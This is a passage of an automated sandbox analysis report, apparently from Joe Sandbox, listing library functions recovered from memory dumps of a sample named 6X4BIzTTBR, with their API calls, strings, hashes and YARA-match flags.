                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction ID: d528c0b564dbcb7d3ed08e129a3793b5758ea83edaa5c0908ff5a697a428bc89
                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction Fuzzy Hash: C431B071A00218EFDB25DF99DCC4D9EBBFCEF99314B10406BEA4497310E670AA45CB64
                                                      Function 046F3034 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 046F3061
                                                        • Part of subcall function 046E8AC2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 046E8ACD
                                                      • SafeSQueue.LIBCONCRT ref: 046F307A
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F313A
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F315B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 3496964030-1946750398
                                                      • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                      • Instruction ID: 40788c513f388a0ac08fbb6480e35033df1730f0686e728c1aef0da53b149984
                                                      • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                      • Instruction Fuzzy Hash: F821B0357002015FDF16EF69C890AB97BA1AF95314F188199DE868B352EB70E845CB91
                                                      Function 046F9043 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,047021D4), ref: 046FE210
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,047021D4), ref: 046FE24A
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 046FE251
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                      • String ID: "1@
                                                      • API String ID: 1079102050-1946750398
                                                      • Opcode ID: 4fd1495440eadd5c3dc41de9799f65349cf24b26b2a276bdd817443b8209e2bc
                                                      • Instruction ID: 06cde5c5606b118816e697f4613344175970c1ea6c10efed7cccba3a1525cded
                                                      • Opcode Fuzzy Hash: 4fd1495440eadd5c3dc41de9799f65349cf24b26b2a276bdd817443b8209e2bc
                                                      • Instruction Fuzzy Hash: 48112770640305EAFB14BBB0DC0DB6D3BA5AF15708F140468FB446B3E1FB66B540C665
                                                      Function 046FE1F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,047021D4), ref: 046FE210
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,047021D4), ref: 046FE24A
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 046FE251
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                      • String ID: "1@
                                                      • API String ID: 1079102050-1946750398
                                                      • Opcode ID: 772db29aeb0659f64b8386b2f2c5c587abdd219a8ee761fd2048cc7d888d034b
                                                      • Instruction ID: f49cfe8e46b28699b13098c97cda0cf3e74b67d1372ea8309718dbc7a6e64405
                                                      • Opcode Fuzzy Hash: 772db29aeb0659f64b8386b2f2c5c587abdd219a8ee761fd2048cc7d888d034b
                                                      • Instruction Fuzzy Hash: 8E110670640304EAFB04ABB0DC0EB6D3BA5AF15709F100468FB446B3E1FBA67540D665
                                                      Function 0040EF3C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,?,0040DE57,0040C66F,?,?,00000000,?,0040C53F,0045D5E4,0040C50C,0045D5DC,?,ios_base::failbit set,0040C66F), ref: 0040EFC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: "1@$W(@
                                                      • API String ID: 1452528299-1069126892
                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction ID: f111cc905f82c8a928de70632128f76a031041254e8db0217e66cfc8f3eabaa4
                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction Fuzzy Hash: 9511CE36200227BFCF125F61DC445AAFB65BB48759B11443AFA46E63A0CA70D8209BE5
                                                      Function 00425F0B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F1D
                                                        • Part of subcall function 00424EEA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F07
                                                        • Part of subcall function 00424EEA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F1C
                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F50
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F7B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                      • String ID: "1@
                                                      • API String ID: 2684344702-1946750398
                                                      • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction ID: faecedbbada0843c4fc82a0c4a58740f890c3ea4f79c63798c37a111b6c67800
                                                      • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction Fuzzy Hash: 0301C439701629ABCB01DF64D5808AE77A9EF89354B61006AEC05EB301DA34EE06DB64
                                                      Function 046F6172 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 046F6184
                                                        • Part of subcall function 046F5151: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 046F516E
                                                        • Part of subcall function 046F5151: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 046F5183
                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 046F61B7
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 046F61E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                      • String ID: "1@
                                                      • API String ID: 2684344702-1946750398
                                                      • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction ID: 7046a0da292cda890b59a6cadb4186f454816d5dd1c4849e548e2a2e6927407e
                                                      • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction Fuzzy Hash: 3E019635A00219ABCF15DF58C9809AE77BAEF89254B100079DD46EB341EA30FE0697A0
                                                      Function 046F428F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ListSafe
                                                      • String ID: @B
                                                      • API String ID: 436756528-2358967077
                                                      • Opcode ID: 7da9a168687d1e4da8fb5bbf0fa12b87a06665a60ff754e8973e0564e5603328
                                                      • Instruction ID: 4a03b2e6d99db2648f2ac2d3de1fb1a4e8af5e44ea9ab4442d33b45dacd039eb
                                                      • Opcode Fuzzy Hash: 7da9a168687d1e4da8fb5bbf0fa12b87a06665a60ff754e8973e0564e5603328
                                                      • Instruction Fuzzy Hash: 1901C47120160AEBC704DF51C880BA6F7F9FF61318F50816AD5454B951FB71F59ACB90
                                                      Function 0040D4DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B52
                                                        • Part of subcall function 00410A61: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A74
                                                        • Part of subcall function 00410A61: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A7E
                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B6B
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                      • String ID: "1@
                                                      • API String ID: 2524916244-1946750398
                                                      • Opcode ID: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction ID: 7ebbd5f4117c6780c4894fdb4466b61b7024d18f635e42f8442c1a99ecd00026
                                                      • Opcode Fuzzy Hash: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction Fuzzy Hash: 9701D235A042218BDF25AB50C8407EDB372AF94711F58006BDA026B365EBBCBD81CB99
                                                      Function 046DD743 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 046E1DB9
                                                        • Part of subcall function 046E0CC8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E0CDB
                                                        • Part of subcall function 046E0CC8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E0CE5
                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 046E1DD2
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 046E1E18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                      • String ID: "1@
                                                      • API String ID: 2524916244-1946750398
                                                      • Opcode ID: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction ID: 775f42c26c619beeff5ce6216e84e33a6e46acdf004fad194dbddab6728565d2
                                                      • Opcode Fuzzy Hash: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction Fuzzy Hash: A801C075A022208BEB15AF62C8A07FDB3F2BF86714F184459D8016B344FF74B905DB91
                                                      Function 0041DA1B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA63
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: "1@$pContext
                                                      • API String ID: 1687795959-994062807
                                                      • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction ID: e9e05c554e934b5f60187f9222a47d7b2d4c25e7b32de392b4464fcfd65fd5fc
                                                      • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction Fuzzy Hash: 44F05939B005159BCB04EB59DC85C5EF7A8AF85761310007BF902E3341DBB8ED05CA98
                                                      Function 0470015B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0470010C,00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002), ref: 0470017B
                                                      • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0470018E
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0470010C,00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002), ref: 047001B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: "1@
                                                      • API String ID: 4061214504-1946750398
                                                      • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                      • Instruction ID: 92245f8c12ae7d0554511226ef0fc0f08c27f307edf5ba27b3722f30a955d746
                                                      • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                      • Instruction Fuzzy Hash: 82F0C834A00208FFDB109F50DC09BAEBFF4EF05B12F100064F805A2290CB745A50CA48
                                                      Function 046DC895 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046DC8F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction ID: b41bf647f2405ce2234b446c080158b1111a8a7299f00e61669dba068dda1261
                                                      • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction Fuzzy Hash: CFF02BB3D0030C6EEB04E954CD01FFA37985B11344F04807BEE51AB182FB69B905C799
                                                      Function 00428DDC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F6D), ref: 0042DFA9
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: W(@
                                                      • API String ID: 3213686812-3174239773
                                                      • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                      • Instruction ID: 943ce1444c0a3fdd2f9a13aeee38a04e77222ecd9776ae0e8bd594c126216534
                                                      • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                      • Instruction Fuzzy Hash: A7F02771B8431676FA203B717E0BBAB19244FA4B4DFD6003FBE09981C3DEAC9550802D
                                                      Function 04710901 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_catchmake_shared
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3472968176-2084237596
                                                      • Opcode ID: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction ID: 5307c51751886bb2e7506d4f71e1bedda4ce6820bf49d619d129ff1db6821184
                                                      • Opcode Fuzzy Hash: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction Fuzzy Hash: 96F06271504169CFEB11EF69C81466C7B61EF01B08F4580A6E6C05BB30EB787981CFE5
                                                      Function 0042DF8D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F6D), ref: 0042DFA9
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: W(@
                                                      • API String ID: 3213686812-3174239773
                                                      • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                      • Instruction ID: 0d7acbed5b354a9a99be5c59b99db76799250d6145fb54ff56176fa68b7c8b6f
                                                      • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                      • Instruction Fuzzy Hash: 97F055B0B8431536FA203BA17E0BBA61A244F94B0DF96003FBF09581C3DEAC8590402D
                                                      Function 004242D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424309
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042431B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424329
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 1381464787-923244539
                                                      • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                      • Instruction ID: 4e749c8b64488bc28458a9bfad9a8a7976c370e0cc6eb5d3994e507a76605f43
                                                      • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                      • Instruction Fuzzy Hash: F2F0A731B012246BCB18FB55F852DDE73A99E403057E0816FB84663582DFBCAE49C65D
                                                      Function 046EE894 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 046EE8B6
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046EE8C9
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046EE8D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 1990795212-1946750398
                                                      • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction ID: 9ec9cc4c5322bb62e30243e00febd6b699dc692708351fccccb5f6337f2d5dd1
                                                      • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction Fuzzy Hash: 79E0D836B0010867CB04FB69DC45C6EBBB9AED0A54754016AE911A7385EFB4BA09C6D8
                                                      Function 00415D9A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DCA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler$version
                                                      • API String ID: 1687795959-3154422776
                                                      • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                      • Instruction ID: d65273e1e78fe5f6c4f9effa117e15e32862206d66943a84ef09515c8d475caf
                                                      • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                      • Instruction Fuzzy Hash: 1BE08634940608F6CB14FA56D80EBDD77A49B01749F60C02F7899210D2DBBC96D8CF4E
                                                      Function 004358A8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction ID: 71dcccbf4812538ec1655c9b2c5f5c4a3b7cbd8a13a3613340c6ecbc00de8342
                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction Fuzzy Hash: D1A13571A00B869FEB15DF18C8917AEFBE1EF59320F28426FD5859B381C23C9941C759
                                                      Function 04705B0F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction ID: f073b738b9a953aaab8c651964e6c629f6658bc2ae4923ea6acdb2c538974ae2
                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction Fuzzy Hash: 87A14571A02786FFEB21CF28C8957AEBBE0EF56310F18816ED5859B3C1D234A941CB50
                                                      Function 0043FA18 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction ID: cf52627d77a6a326e8967249e6afd70085c83c83b1562e4118137266a56cacff
                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction Fuzzy Hash: E0412A71E00114AADB247BBBDC82AAF7A64EF4E334F14123BF818D2291D77C98095669
                                                      Function 0470FC7F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                      • Instruction ID: d0064def7971556615a20dcf729324b398d92ea182547be6aa34f18b35058ce1
                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
